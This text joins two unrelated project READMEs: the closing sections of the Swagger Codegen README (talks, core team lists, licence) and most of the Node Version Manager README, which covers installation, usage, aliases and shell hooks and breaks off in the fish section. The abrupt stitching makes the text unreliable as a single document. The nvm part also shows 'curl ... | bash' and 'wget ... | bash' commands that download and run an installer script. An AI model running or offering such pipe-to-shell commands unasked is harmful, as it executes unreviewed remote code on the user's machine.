- 2016/04/27 - [Automated REST API Development](https://yos.io/2016/04/27/automated-api-development/) by [Yos Riady](https://www.linkedin.com/in/yosriady)
- 2016/05/29 - [Generating Java Spring-MVC code from Swagger Spec](https://www.clianz.com/2016/05/29/java-mvc-swagger-gen/) by [@icha024](https://github.com/icha024)
- 2016/11/05 - [How to generate a REST Application](https://www.youtube.com/watch?v=iyC9BWMe75Q) by [Johannes Fiala](https://github.com/jfiala) @ DevFest Vienna 2016
- 2016/11/10 - [Building an AEM API clients ecosystem](http://blog.cliffano.com/2016/11/10/adobe-marketing-cloud-community-expo/) by Cliffano Subagio, Michael Diender, Stephen Shim from Shine Solutions @ [Adobe Marketing Cloud Community Expo (AMCCE)](https://www.meetup.com/Melbourne-AEM-CQ-Meetup/events/233363101/)
- 2016/11/18 - [How to generate a REST CXF3 application from Swagger-Contract](https://www.slideshare.net/johannes_fiala/how-to-generate-a-rest-cxf3-application-from-swagger-apacheconeu-2016) by [Johannes Fiala](https://github.com/jfiala) @ ApacheConEU 2016
- 2016/11/25 - [Swagger Codegen for Swift3 and NodeJS](https://normand1.github.io/blog/swift/swagger/codegen/2016/11/25/Swagger-Codegen-for-Swift3-and-NodeJS.html) by [David Norman](https://github.com/normand1)
- 2017/03/03 - [Swagger Codegen の使い方の簡単な説明です](https://speakerdeck.com/wagyu298/swagger-codegen) by [wagyu298](https://github.com/wagyu298)
- 2017/03/24 - [Using Open API Specification To Put Lyft SDK Support in the Fast Lane](https://medium.com/lyft-developer-platform/using-open-api-specification-to-put-lyft-sdk-support-in-the-fast-lane-7b623218e4ee) by [Val Polouchkine](https://github.com/vpolouchkine)
- 2017/04/27 - [Swagger Codegen のPHP実装があまりにアレだったので、ライブラリ自作して公開してみた](http://qiita.com/imunew/items/2e9c472e0097e329f2cd) by [imunew](http://qiita.com/imunew)
- 2017/05/17 - [Diseño de APIs con OpenAPI](https://www.slideshare.net/pjmolina/diseo-de-apis-con-openapi) by [Pedro J. Molina](https://github.com/pjmolina) @ [JSDayES 2017](http://2017.jsday.es/)
- 2017/05/22 - [Presentation of the Vert.x-Swagger project](http://vertx.io/blog/presentation-of-the-vert-x-swagger-project/) by [@phiz71](http://github.com/phiz71)
- 2017/06/21 - [Swagger Presentation (Warsaw Ruby Users Group](https://www.youtube.com/watch?v=uCnnDMFQB8U) by [@rafalpetryka](http://github.com/rafalpetryka)
# Swagger Codegen Core Team
Swagger Codegen core team members are contributors who have been making significant contributions (review issues, fix bugs, make enhancements, etc) to the project on a regular basis.
## API Clients
| Languages | Core Team (join date) |
|:-------------|:-------------|
| ActionScript | |
| C++ | |
| C# | @jimschubert (2016/05/01) |
| Clojure | @xhh (2016/05/01) |
| Dart | |
| Groovy | |
| Go | @guohuang (2016/05/01) @neilotoole (2016/05/01) |
| Java | @cbornet (2016/05/01) @xhh (2016/05/01) @epaul (2016/06/04) |
| Java (Spring Cloud) | @cbornet (2016/07/19) |
| Kotlin | @jimschubert (2016/05/01) |
| NodeJS/Javascript | @xhh (2016/05/01) |
| ObjC | @mateuszmackowiak (2016/05/09) |
| Perl | @wing328 (2016/05/01) |
| PHP | @arnested (2016/05/01) |
| Python | @scottrw93 (2016/05/01) |
| Ruby | @wing328 (2016/05/01) @zlx (2016/05/22) |
| Scala | |
| Swift | @jaz-ah (2016/05/01) @Edubits (2016/05/01) |
| TypeScript (Node) | @Vrolijkx (2016/05/01) |
| TypeScript (Angular1) | @Vrolijkx (2016/05/01) |
| TypeScript (Angular2) | @Vrolijkx (2016/05/01) |
| TypeScript (Fetch) | |
## Server Stubs
| Languages | Core Team (date joined) |
|:------------- |:-------------|
| C# ASP.NET5 | @jimschubert (2016/05/01) |
| Go Server | @guohuang (2016/06/13) |
| Haskell Servant | |
| Java Spring Boot | @cbornet (2016/07/19) |
| Java Spring MVC | @kolyjjj (2016/05/01) @cbornet (2016/07/19) |
| Java JAX-RS | |
| Java Play Framework | |
| NancyFX | |
| NodeJS | @kolyjjj (2016/05/01) |
| PHP Lumen | @abcsum (2016/05/01) |
| PHP Silex | |
| PHP Slim | |
| Python Flask | |
| Ruby Sinatra | @wing328 (2016/05/01) | |
| Scala Scalatra | | |
| Scala Finch | @jimschubert (2017/01/28) |
## Template Creator
Here is a list of template creators:
* API Clients:
* Akka-Scala: @cchafer
* Apex: @asnelling
* Bash: @bkryza
* C++ REST: @Danielku15
* C# (.NET 2.0): @who
* C# (.NET Standard 1.3 ): @Gronsak
* C# (.NET 4.5 refactored): @jim
* Clojure: @xhh
* Dart: @yissachar
* Elixir: @niku
* Groovy: @victorgit
* Go: @wing328
* Go (rewritten in 2.3.0): @antihax
* Java (Feign): @davidkiss
* Java (Retrofit): @0legg
* Java (Retrofi2): @emilianobonassi
* Java (Jersey2): @xhh
* Java (okhttp-gson): @xhh
* Java (RestTemplate): @nbruno
* Java (RESTEasy): @gayathrigs
* Javascript/NodeJS: @jfiala
* Javascript (Closure-annotated Angular) @achew22
* JMeter @davidkiss
* Kotlin @jimschubert
* Perl: @wing328
* PHP (Guzzle): @baartosz
* PowerShell: @beatcracker
* Swift: @tkqubo
* Swift 3: @hexelon
* TypeScript (Node): @mhardorf
* TypeScript (Angular1): @mhardorf
* TypeScript (Fetch): @leonyu
* TypeScript (Angular2): @roni-frantchi
* TypeScript (jQuery): @bherila
* Server Stubs
* C# ASP.NET5: @jimschubert
* C# NancyFX: @mstefaniuk
* C++ Pistache: @sebymiano
* C++ Restbed: @stkrwork
* Erlang Server: @galaxie
* Go Server: @guohuang
* Haskell Servant: @algas
* Java MSF4J: @sanjeewa-malalgoda
* Java Spring Boot: @diyfr
* Java Undertow: @stevehu
* Java Play Framework: @JFCote
* JAX-RS RestEasy: @chameleon82
* JAX-RS CXF: @hiveship
* JAX-RS CXF (CDI): @nickcmaynard
* JAX-RS RestEasy (JBoss EAP): @jfiala
* PHP Lumen: @abcsum
* PHP Slim: @jfastnacht
* PHP Zend Expressive (with Path Handler): @Articus
* Ruby on Rails 5: @zlx
* Scala Finch: @jimschubert
* Documentation
* HTML Doc 2: @jhitchcock
* Confluence Wiki: @jhitchcock
## How to join the core team
Here are the requirements to become a core team member:
- rank within top 50 in https://github.com/swagger-api/swagger-codegen/graphs/contributors
- to contribute, here are some good [starting points](https://github.com/swagger-api/swagger-codegen/issues?q=is%3Aopen+is%3Aissue+label%3A%22Need+community+contribution%22)
- regular contributions to the project
- about 3 hours per week
- for contribution, it can be addressing issues, reviewing PRs submitted by others, submitting PR to fix bugs or make enhancements, etc
To join the core team, please reach out to [email protected] (@wing328) for more information.
To become a Template Creator, simply submit a PR for new API client (e.g. Rust, Elixir) or server stub (e.g. Ruby Grape) generator.
# Swagger Codegen Evangelist
Swagger Codegen Evangelist shoulders one or more of the following responsibilities:
- publishes articles on the benefit of Swagger Codegen
- organizes local Meetups
- presents the benefits of Swagger Codegen in local Meetups or conferences
- actively answers questions from others in [Github](https://github.com/swagger-api/swagger-codegen/issues), [StackOverflow](stackoverflow.com/search?q=%5Bswagger%5D)
- submits PRs to improve Swagger Codegen
- reviews PRs submitted by the others
- ranks within top 100 in the [contributor list](https://github.com/swagger-api/swagger-codegen/graphs/contributors)
If you want to be a Swagger Codegen Evangelist, please kindly apply by sending an email to [email protected] (@wing328)
### List of Swagger Codegen Evangelists
- Cliffano Subagio (@cliffano from Australia joined on Dec 9, 2016)
- [Building An AEM API Clients Ecosystem](http://www.slideshare.net/cliffano/building-an-aem-api-clients-ecosystem)
- [Adobe Marketing Cloud Community Expo](http://blog.cliffano.com/2016/11/10/adobe-marketing-cloud-community-expo/)
# License information on Generated Code
The Swagger Codegen project is intended as a benefit for users of the Swagger / Open API Specification. The project itself has the [License](#license) as specified. In addition, please understand the following points:
* The templates included with this project are subject to the [License](#license).
* Generated code is intentionally _not_ subject to the parent project license
When code is generated from this project, it shall be considered **AS IS** and owned by the user of the software. There are no warranties--expressed or implied--for generated code. You can do what you wish with it, and once generated, the code is your responsibility and subject to the licensing terms that you deem appropriate.
License
-------
Copyright 2017 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at [apache.org/licenses/LICENSE-2.0](http://www.apache.org/licenses/LICENSE-2.0)
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
---
<img src="http://swagger.io/wp-content/uploads/2016/02/logo.jpg"/>
|
# Node Version Manager [![Build Status](https://travis-ci.org/nvm-sh/nvm.svg?branch=master)][3] [![nvm version](https://img.shields.io/badge/version-v0.37.2-yellow.svg)][4] [![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/684/badge)](https://bestpractices.coreinfrastructure.org/projects/684)
<!-- To update this table of contents, ensure you have run `npm install` then `npm run doctoc` -->
<!-- START doctoc generated TOC please keep comment here to allow auto update -->
<!-- DON'T EDIT THIS SECTION, INSTEAD RE-RUN doctoc TO UPDATE -->
## Table of Contents
- [About](#about)
- [Installing and Updating](#installing-and-updating)
- [Install & Update Script](#install--update-script)
- [Additional Notes](#additional-notes)
- [Troubleshooting on Linux](#troubleshooting-on-linux)
- [Troubleshooting on macOS](#troubleshooting-on-macos)
- [Ansible](#ansible)
- [Verify Installation](#verify-installation)
- [Important Notes](#important-notes)
- [Git Install](#git-install)
- [Manual Install](#manual-install)
- [Manual Upgrade](#manual-upgrade)
- [Usage](#usage)
- [Long-term Support](#long-term-support)
- [Migrating Global Packages While Installing](#migrating-global-packages-while-installing)
- [Default Global Packages From File While Installing](#default-global-packages-from-file-while-installing)
- [io.js](#iojs)
- [System Version of Node](#system-version-of-node)
- [Listing Versions](#listing-versions)
- [Setting Custom Colors](#setting-custom-colors)
- [Persisting custom colors](#persisting-custom-colors)
- [Suppressing colorized output](#suppressing-colorized-output)
- [Restoring PATH](#restoring-path)
- [Set default node version](#set-default-node-version)
- [Use a mirror of node binaries](#use-a-mirror-of-node-binaries)
- [.nvmrc](#nvmrc)
- [Deeper Shell Integration](#deeper-shell-integration)
- [bash](#bash)
- [Automatically call `nvm use`](#automatically-call-nvm-use)
- [zsh](#zsh)
- [Calling `nvm use` automatically in a directory with a `.nvmrc` file](#calling-nvm-use-automatically-in-a-directory-with-a-nvmrc-file)
- [fish](#fish)
- [Calling `nvm use` automatically in a directory with a `.nvmrc` file](#calling-nvm-use-automatically-in-a-directory-with-a-nvmrc-file-1)
- [License](#license)
- [Running Tests](#running-tests)
- [Environment variables](#environment-variables)
- [Bash Completion](#bash-completion)
- [Usage](#usage-1)
- [Compatibility Issues](#compatibility-issues)
- [Installing nvm on Alpine Linux](#installing-nvm-on-alpine-linux)
- [Uninstalling / Removal](#uninstalling--removal)
- [Manual Uninstall](#manual-uninstall)
- [Docker For Development Environment](#docker-for-development-environment)
- [Problems](#problems)
- [macOS Troubleshooting](#macos-troubleshooting)
<!-- END doctoc generated TOC please keep comment here to allow auto update -->
## About
nvm is a version manager for [node.js](https://nodejs.org/en/), designed to be installed per-user, and invoked per-shell. `nvm` works on any POSIX-compliant shell (sh, dash, ksh, zsh, bash), in particular on these platforms: unix, macOS, and windows WSL.
<a id="installation-and-update"></a>
<a id="install-script"></a>
## Installing and Updating
### Install & Update Script
To **install** or **update** nvm, you should run the [install script][2]. To do that, you may either download and run the script manually, or use the following cURL or Wget command:
```sh
curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.37.2/install.sh | bash
```
```sh
wget -qO- https://raw.githubusercontent.com/nvm-sh/nvm/v0.37.2/install.sh | bash
```
Running either of the above commands downloads a script and runs it. The script clones the nvm repository to `~/.nvm`, and attempts to add the source lines from the snippet below to the correct profile file (`~/.bash_profile`, `~/.zshrc`, `~/.profile`, or `~/.bashrc`).
<a id="profile_snippet"></a>
```sh
export NVM_DIR="$([ -z "${XDG_CONFIG_HOME-}" ] && printf %s "${HOME}/.nvm" || printf %s "${XDG_CONFIG_HOME}/nvm")"
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm
```
#### Additional Notes
- If the environment variable `$XDG_CONFIG_HOME` is present, it will place the `nvm` files there.</sub>
- You can add `--no-use` to the end of the above script (...`nvm.sh --no-use`) to postpone using `nvm` until you manually [`use`](#usage) it.
- You can customize the install source, directory, profile, and version using the `NVM_SOURCE`, `NVM_DIR`, `PROFILE`, and `NODE_VERSION` variables.
Eg: `curl ... | NVM_DIR="path/to/nvm"`. Ensure that the `NVM_DIR` does not contain a trailing slash.
- The installer can use `git`, `curl`, or `wget` to download `nvm`, whichever is available.
#### Troubleshooting on Linux
On Linux, after running the install script, if you get `nvm: command not found` or see no feedback from your terminal after you type `command -v nvm`, simply close your current terminal, open a new terminal, and try verifying again.
Alternatively, you can run run the following commands for the different shells on the command line:
*bash*: `source ~/.bashrc`
*zsh*: `source ~/.zshrc`
*ksh*: `. ~/.profile`
These should pick up the `nvm` command.
#### Troubleshooting on macOS
Since OS X 10.9, `/usr/bin/git` has been preset by Xcode command line tools, which means we can't properly detect if Git is installed or not. You need to manually install the Xcode command line tools before running the install script, otherwise, it'll fail. (see [#1782](https://github.com/nvm-sh/nvm/issues/1782))
If you get `nvm: command not found` after running the install script, one of the following might be the reason:
- Since macOS 10.15, the default shell is `zsh` and nvm will look for `.zshrc` to update, none is installed by default. Create one with `touch ~/.zshrc` and run the install script again.
- If you use bash, the previous default shell, your system may not have a `.bash_profile` file where the command is set up. Create one with `touch ~/.bash_profile` and run the install script again. Then, run `source ~/.bash_profile` to pick up the `nvm` command.
- You have previously used `bash`, but you have `zsh` installed. You need to manually add [these lines](#manual-install) to `~/.zshrc` and run `. ~/.zshrc`.
- You might need to restart your terminal instance or run `. ~/.nvm/nvm.sh`. Restarting your terminal/opening a new tab/window, or running the source command will load the command and the new configuration.
- If the above didn't help, you might need to restart your terminal instance. Try opening a new tab/window in your terminal and retry.
If the above doesn't fix the problem, you may try the following:
- If you use bash, it may be that your `.bash_profile` (or `~/.profile`) does not source your `~/.bashrc` properly. You could fix this by adding `source ~/<your_profile_file>` to it or follow the next step below.
- Try adding [the snippet from the install section](#profile_snippet), that finds the correct nvm directory and loads nvm, to your usual profile (`~/.bash_profile`, `~/.zshrc`, `~/.profile`, or `~/.bashrc`).
- For more information about this issue and possible workarounds, please [refer here](https://github.com/nvm-sh/nvm/issues/576)
#### Ansible
You can use a task:
```yaml
- name: nvm
shell: >
curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.37.2/install.sh | bash
args:
creates: "{{ ansible_env.HOME }}/.nvm/nvm.sh"
```
### Verify Installation
To verify that nvm has been installed, do:
```sh
command -v nvm
```
which should output `nvm` if the installation was successful. Please note that `which nvm` will not work, since `nvm` is a sourced shell function, not an executable binary.
### Important Notes
If you're running a system without prepackaged binary available, which means you're going to install nodejs or io.js from its source code, you need to make sure your system has a C++ compiler. For OS X, Xcode will work, for Debian/Ubuntu based GNU/Linux, the `build-essential` and `libssl-dev` packages work.
**Note:** `nvm` does not support Windows (see [#284](https://github.com/nvm-sh/nvm/issues/284)), but may work in WSL (Windows Subsystem for Linux) depending on the version of WSL. For Windows, a few alternatives exist, which are neither supported nor developed by us:
- [nvm-windows](https://github.com/coreybutler/nvm-windows)
- [nodist](https://github.com/marcelklehr/nodist)
- [nvs](https://github.com/jasongin/nvs)
**Note:** `nvm` does not support [Fish] either (see [#303](https://github.com/nvm-sh/nvm/issues/303)). Alternatives exist, which are neither supported nor developed by us:
- [bass](https://github.com/edc/bass) allows you to use utilities written for Bash in fish shell
- [fast-nvm-fish](https://github.com/brigand/fast-nvm-fish) only works with version numbers (not aliases) but doesn't significantly slow your shell startup
- [plugin-nvm](https://github.com/derekstavis/plugin-nvm) plugin for [Oh My Fish](https://github.com/oh-my-fish/oh-my-fish), which makes nvm and its completions available in fish shell
- [fnm](https://github.com/fisherman/fnm) - [fisherman](https://github.com/fisherman/fisherman)-based version manager for fish
- [fish-nvm](https://github.com/FabioAntunes/fish-nvm) - Wrapper around nvm for fish, delays sourcing nvm until it's actually used.
**Note:** We still have some problems with FreeBSD, because there is no official pre-built binary for FreeBSD, and building from source may need [patches](https://www.freshports.org/www/node/files/patch-deps_v8_src_base_platform_platform-posix.cc); see the issue ticket:
- [[#900] [Bug] nodejs on FreeBSD may need to be patched](https://github.com/nvm-sh/nvm/issues/900)
- [nodejs/node#3716](https://github.com/nodejs/node/issues/3716)
**Note:** On OS X, if you do not have Xcode installed and you do not wish to download the ~4.3GB file, you can install the `Command Line Tools`. You can check out this blog post on how to just that:
- [How to Install Command Line Tools in OS X Mavericks & Yosemite (Without Xcode)](http://osxdaily.com/2014/02/12/install-command-line-tools-mac-os-x/)
**Note:** On OS X, if you have/had a "system" node installed and want to install modules globally, keep in mind that:
- When using `nvm` you do not need `sudo` to globally install a module with `npm -g`, so instead of doing `sudo npm install -g grunt`, do instead `npm install -g grunt`
- If you have an `~/.npmrc` file, make sure it does not contain any `prefix` settings (which is not compatible with `nvm`)
- You can (but should not?) keep your previous "system" node install, but `nvm` will only be available to your user account (the one used to install nvm). This might cause version mismatches, as other users will be using `/usr/local/lib/node_modules/*` VS your user account using `~/.nvm/versions/node/vX.X.X/lib/node_modules/*`
Homebrew installation is not supported. If you have issues with homebrew-installed `nvm`, please `brew uninstall` it, and install it using the instructions below, before filing an issue.
**Note:** If you're using `zsh` you can easily install `nvm` as a zsh plugin. Install [`zsh-nvm`](https://github.com/lukechilds/zsh-nvm) and run `nvm upgrade` to upgrade.
**Note:** Git versions before v1.7 may face a problem of cloning `nvm` source from GitHub via https protocol, and there is also different behavior of git before v1.6, and git prior to [v1.17.10](https://github.com/git/git/commit/5a7d5b683f869d3e3884a89775241afa515da9e7) can not clone tags, so the minimum required git version is v1.7.10. If you are interested in the problem we mentioned here, please refer to GitHub's [HTTPS cloning errors](https://help.github.com/articles/https-cloning-errors/) article.
### Git Install
If you have `git` installed (requires git v1.7.10+):
1. clone this repo in the root of your user profile
- `cd ~/` from anywhere then `git clone https://github.com/nvm-sh/nvm.git .nvm`
1. `cd ~/.nvm` and check out the latest version with `git checkout v0.37.2`
1. activate `nvm` by sourcing it from your shell: `. ./nvm.sh`
Now add these lines to your `~/.bashrc`, `~/.profile`, or `~/.zshrc` file to have it automatically sourced upon login:
(you may have to add to more than one of the above files)
```sh
export NVM_DIR="$HOME/.nvm"
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm
[ -s "$NVM_DIR/bash_completion" ] && \. "$NVM_DIR/bash_completion" # This loads nvm bash_completion
```
### Manual Install
For a fully manual install, execute the following lines to first clone the `nvm` repository into `$HOME/.nvm`, and then load `nvm`:
```sh
export NVM_DIR="$HOME/.nvm" && (
git clone https://github.com/nvm-sh/nvm.git "$NVM_DIR"
cd "$NVM_DIR"
git checkout `git describe --abbrev=0 --tags --match "v[0-9]*" $(git rev-list --tags --max-count=1)`
) && \. "$NVM_DIR/nvm.sh"
```
Now add these lines to your `~/.bashrc`, `~/.profile`, or `~/.zshrc` file to have it automatically sourced upon login:
(you may have to add to more than one of the above files)
```sh
export NVM_DIR="$HOME/.nvm"
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm
```
### Manual Upgrade
For manual upgrade with `git` (requires git v1.7.10+):
1. change to the `$NVM_DIR`
1. pull down the latest changes
1. check out the latest version
1. activate the new version
```sh
(
cd "$NVM_DIR"
git fetch --tags origin
git checkout `git describe --abbrev=0 --tags --match "v[0-9]*" $(git rev-list --tags --max-count=1)`
) && \. "$NVM_DIR/nvm.sh"
```
## Usage
To download, compile, and install the latest release of node, do this:
```sh
nvm install node # "node" is an alias for the latest version
```
To install a specific version of node:
```sh
nvm install 6.14.4 # or 10.10.0, 8.9.1, etc
```
The first version installed becomes the default. New shells will start with the default version of node (e.g., `nvm alias default`).
You can list available versions using `ls-remote`:
```sh
nvm ls-remote
```
And then in any new shell just use the installed version:
```sh
nvm use node
```
Or you can just run it:
```sh
nvm run node --version
```
Or, you can run any arbitrary command in a subshell with the desired version of node:
```sh
nvm exec 4.2 node --version
```
You can also get the path to the executable to where it was installed:
```sh
nvm which 5.0
```
In place of a version pointer like "0.10" or "5.0" or "4.2.1", you can use the following special default aliases with `nvm install`, `nvm use`, `nvm run`, `nvm exec`, `nvm which`, etc:
- `node`: this installs the latest version of [`node`](https://nodejs.org/en/)
- `iojs`: this installs the latest version of [`io.js`](https://iojs.org/en/)
- `stable`: this alias is deprecated, and only truly applies to `node` `v0.12` and earlier. Currently, this is an alias for `node`.
- `unstable`: this alias points to `node` `v0.11` - the last "unstable" node release, since post-1.0, all node versions are stable. (in SemVer, versions communicate breakage, not stability).
### Long-term Support
Node has a [schedule](https://github.com/nodejs/Release#release-schedule) for long-term support (LTS) You can reference LTS versions in aliases and `.nvmrc` files with the notation `lts/*` for the latest LTS, and `lts/argon` for LTS releases from the "argon" line, for example. In addition, the following commands support LTS arguments:
- `nvm install --lts` / `nvm install --lts=argon` / `nvm install 'lts/*'` / `nvm install lts/argon`
- `nvm uninstall --lts` / `nvm uninstall --lts=argon` / `nvm uninstall 'lts/*'` / `nvm uninstall lts/argon`
- `nvm use --lts` / `nvm use --lts=argon` / `nvm use 'lts/*'` / `nvm use lts/argon`
- `nvm exec --lts` / `nvm exec --lts=argon` / `nvm exec 'lts/*'` / `nvm exec lts/argon`
- `nvm run --lts` / `nvm run --lts=argon` / `nvm run 'lts/*'` / `nvm run lts/argon`
- `nvm ls-remote --lts` / `nvm ls-remote --lts=argon` `nvm ls-remote 'lts/*'` / `nvm ls-remote lts/argon`
- `nvm version-remote --lts` / `nvm version-remote --lts=argon` / `nvm version-remote 'lts/*'` / `nvm version-remote lts/argon`
Any time your local copy of `nvm` connects to https://nodejs.org, it will re-create the appropriate local aliases for all available LTS lines. These aliases (stored under `$NVM_DIR/alias/lts`), are managed by `nvm`, and you should not modify, remove, or create these files - expect your changes to be undone, and expect meddling with these files to cause bugs that will likely not be supported.
To get the latest LTS version of node and migrate your existing installed packages, use
```sh
nvm install 'lts/*' --reinstall-packages-from=current
```
### Migrating Global Packages While Installing
If you want to install a new version of Node.js and migrate npm packages from a previous version:
```sh
nvm install node --reinstall-packages-from=node
```
This will first use "nvm version node" to identify the current version you're migrating packages from. Then it resolves the new version to install from the remote server and installs it. Lastly, it runs "nvm reinstall-packages" to reinstall the npm packages from your prior version of Node to the new one.
You can also install and migrate npm packages from specific versions of Node like this:
```sh
nvm install 6 --reinstall-packages-from=5
nvm install v4.2 --reinstall-packages-from=iojs
```
Note that reinstalling packages _explicitly does not update the npm version_ — this is to ensure that npm isn't accidentally upgraded to a broken version for the new node version.
To update npm at the same time add the `--latest-npm` flag, like this:
```sh
nvm install 'lts/*' --reinstall-packages-from=default --latest-npm
```
or, you can at any time run the following command to get the latest supported npm version on the current node version:
```sh
nvm install-latest-npm
```
If you've already gotten an error to the effect of "npm does not support Node.js", you'll need to (1) revert to a previous node version (`nvm ls` & `nvm use <your latest _working_ version from the ls>`, (2) delete the newly created node version (`nvm uninstall <your _broken_ version of node from the ls>`), then (3) rerun your `nvm install` with the `--latest-npm` flag.
### Default Global Packages From File While Installing
If you have a list of default packages you want installed every time you install a new version, we support that too -- just add the package names, one per line, to the file `$NVM_DIR/default-packages`. You can add anything npm would accept as a package argument on the command line.
```sh
# $NVM_DIR/default-packages
rimraf
[email protected]
stevemao/left-pad
```
### io.js
If you want to install [io.js](https://github.com/iojs/io.js/):
```sh
nvm install iojs
```
If you want to install a new version of io.js and migrate npm packages from a previous version:
```sh
nvm install iojs --reinstall-packages-from=iojs
```
The same guidelines mentioned for migrating npm packages in node are applicable to io.js.
### System Version of Node
If you want to use the system-installed version of node, you can use the special default alias "system":
```sh
nvm use system
nvm run system --version
```
### Listing Versions
If you want to see what versions are installed:
```sh
nvm ls
```
If you want to see what versions are available to install:
```sh
nvm ls-remote
```
### Setting Custom Colors
You can set five colors that will be used to display version and alias information. These colors replace the default colors.
Initial colors are: g b y r e
Color codes:
r/R = red / bold red
g/G = green / bold green
b/B = blue / bold blue
c/C = cyan / bold cyan
m/M = magenta / bold magenta
y/Y = yellow / bold yellow
k/K = black / bold black
e/W = light grey / white
```sh
nvm set-colors rgBcm
```
#### Persisting custom colors
If you want the custom colors to persist after terminating the shell, export the NVM_COLORS variable in your shell profile. For example, if you want to use cyan, magenta, green, bold red and bold yellow, add the following line:
```sh
export NVM_COLORS='cmgRY'
```
#### Suppressing colorized output
`nvm help (or -h or --help)`, `nvm ls`, `nvm ls-remote` and `nvm alias` usually produce colorized output. You can disable colors with the `--no-colors` option (or by setting the environment variable `TERM=dumb`):
```sh
nvm ls --no-colors
nvm help --no-colors
TERM=dumb nvm ls
```
#### Restoring PATH
To restore your PATH, you can deactivate it:
```sh
nvm deactivate
```
#### Set default node version
To set a default Node version to be used in any new shell, use the alias 'default':
```sh
nvm alias default node
```
#### Use a mirror of node binaries
To use a mirror of the node binaries, set `$NVM_NODEJS_ORG_MIRROR`:
```sh
export NVM_NODEJS_ORG_MIRROR=https://nodejs.org/dist
nvm install node
NVM_NODEJS_ORG_MIRROR=https://nodejs.org/dist nvm install 4.2
```
To use a mirror of the io.js binaries, set `$NVM_IOJS_ORG_MIRROR`:
```sh
export NVM_IOJS_ORG_MIRROR=https://iojs.org/dist
nvm install iojs-v1.0.3
NVM_IOJS_ORG_MIRROR=https://iojs.org/dist nvm install iojs-v1.0.3
```
`nvm use` will not, by default, create a "current" symlink. Set `$NVM_SYMLINK_CURRENT` to "true" to enable this behavior, which is sometimes useful for IDEs. Note that using `nvm` in multiple shell tabs with this environment variable enabled can cause race conditions.
### .nvmrc
You can create a `.nvmrc` file containing a node version number (or any other string that `nvm` understands; see `nvm --help` for details) in the project root directory (or any parent directory).
Afterwards, `nvm use`, `nvm install`, `nvm exec`, `nvm run`, and `nvm which` will use the version specified in the `.nvmrc` file if no version is supplied on the command line.
For example, to make nvm default to the latest 5.9 release, the latest LTS version, or the latest node version for the current directory:
```sh
$ echo "5.9" > .nvmrc
$ echo "lts/*" > .nvmrc # to default to the latest LTS version
$ echo "node" > .nvmrc # to default to the latest version
```
[NB these examples assume a POSIX-compliant shell version of `echo`. If you use a Windows `cmd` development environment, eg the `.nvmrc` file is used to configure a remote Linux deployment, then keep in mind the `"`s will be copied leading to an invalid file. Remove them.]
Then when you run nvm:
```sh
$ nvm use
Found '/path/to/project/.nvmrc' with version <5.9>
Now using node v5.9.1 (npm v3.7.3)
```
`nvm use` et. al. will traverse directory structure upwards from the current directory looking for the `.nvmrc` file. In other words, running `nvm use` et. al. in any subdirectory of a directory with an `.nvmrc` will result in that `.nvmrc` being utilized.
The contents of a `.nvmrc` file **must** be the `<version>` (as described by `nvm --help`) followed by a newline. No trailing spaces are allowed, and the trailing newline is required.
### Deeper Shell Integration
You can use [`avn`](https://github.com/wbyoung/avn) to deeply integrate into your shell and automatically invoke `nvm` when changing directories. `avn` is **not** supported by the `nvm` development team. Please [report issues to the `avn` team](https://github.com/wbyoung/avn/issues/new).
If you prefer a lighter-weight solution, the recipes below have been contributed by `nvm` users. They are **not** supported by the `nvm` development team. We are, however, accepting pull requests for more examples.
#### bash
##### Automatically call `nvm use`
Put the following at the end of your `$HOME/.bashrc`:
```bash
cdnvm() {
cd "$@";
nvm_path=$(nvm_find_up .nvmrc | tr -d '\n')
# If there are no .nvmrc file, use the default nvm version
if [[ ! $nvm_path = *[^[:space:]]* ]]; then
declare default_version;
default_version=$(nvm version default);
# If there is no default version, set it to `node`
# This will use the latest version on your machine
if [[ $default_version == "N/A" ]]; then
nvm alias default node;
default_version=$(nvm version default);
fi
# If the current version is not the default version, set it to use the default version
if [[ $(nvm current) != "$default_version" ]]; then
nvm use default;
fi
elif [[ -s $nvm_path/.nvmrc && -r $nvm_path/.nvmrc ]]; then
declare nvm_version
nvm_version=$(<"$nvm_path"/.nvmrc)
declare locally_resolved_nvm_version
# `nvm ls` will check all locally-available versions
# If there are multiple matching versions, take the latest one
# Remove the `->` and `*` characters and spaces
# `locally_resolved_nvm_version` will be `N/A` if no local versions are found
locally_resolved_nvm_version=$(nvm ls --no-colors "$nvm_version" | tail -1 | tr -d '\->*' | tr -d '[:space:]')
# If it is not already installed, install it
# `nvm install` will implicitly use the newly-installed version
if [[ "$locally_resolved_nvm_version" == "N/A" ]]; then
nvm install "$nvm_version";
elif [[ $(nvm current) != "$locally_resolved_nvm_version" ]]; then
nvm use "$nvm_version";
fi
fi
}
alias cd='cdnvm'
cd $PWD
```
This alias would search 'up' from your current directory in order to detect a `.nvmrc` file. If it finds it, it will switch to that version; if not, it will use the default version.
#### zsh
##### Calling `nvm use` automatically in a directory with a `.nvmrc` file
Put this into your `$HOME/.zshrc` to call `nvm use` automatically whenever you enter a directory that contains an
`.nvmrc` file with a string telling nvm which node to `use`:
```zsh
# place this after nvm initialization!
autoload -U add-zsh-hook
load-nvmrc() {
local node_version="$(nvm version)"
local nvmrc_path="$(nvm_find_nvmrc)"
if [ -n "$nvmrc_path" ]; then
local nvmrc_node_version=$(nvm version "$(cat "${nvmrc_path}")")
if [ "$nvmrc_node_version" = "N/A" ]; then
nvm install
elif [ "$nvmrc_node_version" != "$node_version" ]; then
nvm use
fi
elif [ "$node_version" != "$(nvm version default)" ]; then
echo "Reverting to nvm default version"
nvm use default
fi
}
add-zsh-hook chpwd load-nvmrc
load-nvmrc
```
#### fish
##### Calling `nvm use` automatically in a directory with a `.nvmrc` file
This requires that you have [bass](https://github.com/edc/bass) installed.
```fish
# ~/.config/fish/functions/nvm.fish
function nvm
bass source ~/.nvm/nvm.sh --no-use ';' nvm $argv
end
